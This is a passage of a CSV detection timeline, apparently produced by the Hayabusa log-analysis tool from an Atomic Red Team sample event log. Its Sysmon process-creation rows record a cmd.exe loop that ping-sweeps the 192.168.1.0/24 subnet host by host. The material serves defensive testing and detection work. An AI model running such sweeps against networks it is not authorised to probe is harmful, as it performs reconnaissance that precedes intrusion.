C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:59.001 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:59.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:00.063 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:00.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:00.940 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:01.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:02.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:02.565 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:03.059 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:03.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:04.024 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:04.522 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:05.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:05.516 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:06.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:06.440 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:07.053 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:07.413 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:08.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:08.500 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:09.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:09.474 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:10.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:10.522 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:11.031 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:11.504 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:12.023 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:12.547 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:13.030 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:13.489 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:14.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:14.552 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:15.051 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:15.548 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:16.040 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:16.584 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:17.041 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:17.511 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:18.015 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:18.509 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:18.990 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:19.541 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:20.006 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:20.543 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:21.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:21.488 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 